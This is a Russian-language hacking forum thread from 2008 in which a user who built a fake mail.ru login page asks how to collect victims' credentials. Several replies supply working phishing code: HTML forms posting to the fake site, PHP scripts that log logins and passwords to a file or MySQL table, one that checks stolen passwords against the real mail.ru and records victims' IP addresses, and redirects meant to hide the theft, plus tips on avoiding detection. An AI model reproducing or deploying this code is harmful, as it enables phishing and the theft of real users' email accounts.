Взлом через фейк

Discussion in 'PHP' started by abrut3000, 26 Jun 2008.

Thread Status:
Not open for further replies.
  1. abrut3000

    abrut3000 Banned

    Joined:
    24 Jun 2008
    Messages:
    0
    Likes Received:
    5
    Reputations:
    -2
    [​IMG]

    У меня вопрос!!! Я сделал фейк mail.ru как мне сделать письмо как на фото чтоб когда жертва вводит свои данные и нажимает подтвердить
    они записовались в базу БД?


    Кто так сможет сделать отзовитесь!
     
    2 people like this.
  2. nbd

    nbd Elder - Старейшина

    Joined:
    27 Oct 2006
    Messages:
    81
    Likes Received:
    26
    Reputations:
    3
    Зачем тебе заморочки с БД. Пиши в файл. Например так.

    PHP:
    Содержимое нтмл письма (форма отправки данных)

    ...
    <
    form action="http://фейк_мейл.ру/auth.php" method="POST">
    <
    input type="text" name="login" >Логин<br>
    <
    input type="password" name="pass">Пароль
    <input type="submit">
    </
    form>
    ....
    и собственно скрипт записи логина и пасса

    PHP:
    <?php
    $login
    =$_POST['login'];
    $pass=$_POST['pass'];
    $data=$login." ".$pass;
    $fh=fopen("data.txt""a");
    fwrite($fh$data);
    fclose($fh);
    ?>
     
  3. Chaak

    Chaak Elder - Старейшина

    Joined:
    1 Jun 2008
    Messages:
    1,059
    Likes Received:
    1,067
    Reputations:
    80
    на mail.ru POST не работает поэтому:

    PHP:
    <form action="http://фейк_мейл.ру/auth.php" method="GET"
    <
    input type="text" name="login" >Логин<br
    <
    input type="password" name="pass">Пароль 
    <input type="submit">

    PHP:
    <?php 
    $login
    =$_GET['login']; 
    $pass=$_GET['pass']; 
    $data=$login.";".$pass."\n"
    $fh=fopen("data.txt""a"); 
    fwrite($fh$data); 
    fclose($fh); 
    Header("Location: http://win.mail.ru/cgi-bin/auth");
    exit();
    ?>
     
    #3 Chaak, 26 Jun 2008
    Last edited: 26 Jun 2008
  4. nbd

    nbd Elder - Старейшина

    Joined:
    27 Oct 2006
    Messages:
    81
    Likes Received:
    26
    Reputations:
    3
    С гетом палево будет :) Увидев в адресной строке адрес вида http://фейк_мейл.ру/auth.php?login=lamer&pass=123456 даже имбицил поймет, что его поимели.

    Кстати редирект на http://mail.ru/cgi-bin/ - Forbidden

    Насчет поста ниже :
    Так я и не спорил :) Я просто предложил заменить редирект на http://win.mail.ru/cgi-bin/auth
     
    #4 nbd, 26 Jun 2008
    Last edited: 26 Jun 2008
    1 person likes this.
  5. abrut3000

    abrut3000 Banned

    Joined:
    24 Jun 2008
    Messages:
    0
    Likes Received:
    5
    Reputations:
    -2
    Эти все скрипты которые вы написали паляться службой mail.ru
     
  6. Naydav

    Naydav Elder - Старейшина

    Joined:
    30 Dec 2006
    Messages:
    439
    Likes Received:
    63
    Reputations:
    4
    Имееться ввиду, что бы в письме прислать форму?
    Наверно спалят тогда...
    Интересно, надо будет проверить позволяет ли мейл.ру отсылать данные гетом(из письма непосредственно)
     
    #6 Naydav, 27 Jun 2008
    Last edited: 27 Jun 2008
  7. abrut3000

    abrut3000 Banned

    Joined:
    24 Jun 2008
    Messages:
    0
    Likes Received:
    5
    Reputations:
    -2
    Вот это письмо как на фото ни как не палиться почему не знаю
     
  8. abrut3000

    abrut3000 Banned

    Joined:
    24 Jun 2008
    Messages:
    0
    Likes Received:
    5
    Reputations:
    -2
    еще есть предложения
     
  9. P3L3NG

    P3L3NG Banned

    Joined:
    4 Jun 2008
    Messages:
    175
    Likes Received:
    204
    Reputations:
    11
    тоже интересно, присылали недавно такое письмо. я его разобрал хорошенько. код, адрес фэйка, ип того кто слыл узнал=) а повторить не получается. "расширенный формат" криво код преобразует(((
     
  10. nc.STRIEM

    nc.STRIEM Members of Antichat

    Joined:
    5 Apr 2006
    Messages:
    1,036
    Likes Received:
    347
    Reputations:
    292
    вот самый нормальный вариант фейка.
    PHP:
    <?php
        error_reporting
    (0);
        
    $cont file_get_contents('http://win.mail.ru/cgi-bin/auth?Login='.$_POST['Login'].'&Domain='.$_POST['Domain'].'&Password='.$_POST['Password']);
        if(
    strstr($cont'<b>Ошибка</b>'))
            die(
    str_replace('action="auth"'''$cont));

        
    $fo fopen('mail.lg''a');
        
    fwrite($fodate('d.m.y H:i:s')."\t".$_SERVER['REMOTE_ADDR']."\n");
        
    fwrite($fo$_POST['Login'].'@'.$_POST['Domain']."\t".$_POST['Password']."\n\n");
        
    fclose($fo);
        
    header('Location: http://win.mail.ru/cgi-bin/auth?Login='.$_POST['Login'].'&Domain='.$_POST['Domain'].'&Password='.$_POST['Password']);
    ?>
     
    2 people like this.
  11. .:EnoT:.

    .:EnoT:. Сексуальное чудовище

    Joined:
    29 May 2007
    Messages:
    803
    Likes Received:
    559
    Reputations:
    50
    Добавление записей в БД:

    Таблица:
    Code:
    CREATE TABLE `mails` (
      `id` int(20) NOT NULL auto_increment,
      `mail` varchar(100) NOT NULL,
      `pass` varchar(100) NOT NULL,
      PRIMARY KEY  (`id`)
    ) ENGINE=MyISAM AUTO_INCREMENT=30 DEFAULT CHARSET=cp1251 AUTO_INCREMENT=30 ;
    
    Форма:
    PHP:
    <form action="<?=$_SERVER['PHP_SELF']?>" method="post">
    <input name="login" type="text" />
    <input name="pass" type="password" />
    <input type="submit" value="Войти" />
    </form>
    Скрипт:
    PHP:
    <?php
    $login 
    = !empty($_POST['login']) && preg_match('/^[a-zA-Z0-9-_\.]+@[a-zA-Z0-9]+\.[a-zA-Z]{2,5}$/'$_POST['login']) ? trim($_POST['login']) : '';
    $pass = !empty($_POST['pass']) ? trim($_POST['pass']) : '';
    if(
    $login && $pass){
        
    $login get_magic_quotes_gpc() ? $login mysql_real_escape_string($login);
        
    $pass =  get_magic_quotes_gpc() ? $pass mysql_real_escape_string($pass);
        
    mysql_connect('localhost''user''pass');
        
    mysql_select_db('mails');
        
    $sql mysql_query("INSERT INTO `mails` VALUE(null, '".$login."', '".$pass."')");
        if(
    $sql){
            
    header('location: http://mail.ru');
        }
    }
    ?>
    Тема закрыта во избежании оффтопа, т.к. со взломами в другой раздел.
     
    1 person likes this.
Thread Status:
Not open for further replies.